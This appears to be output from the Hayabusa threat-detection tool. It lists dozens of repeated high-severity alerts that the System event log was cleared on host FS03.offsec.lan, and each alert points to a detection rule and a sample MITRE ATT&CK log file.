2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
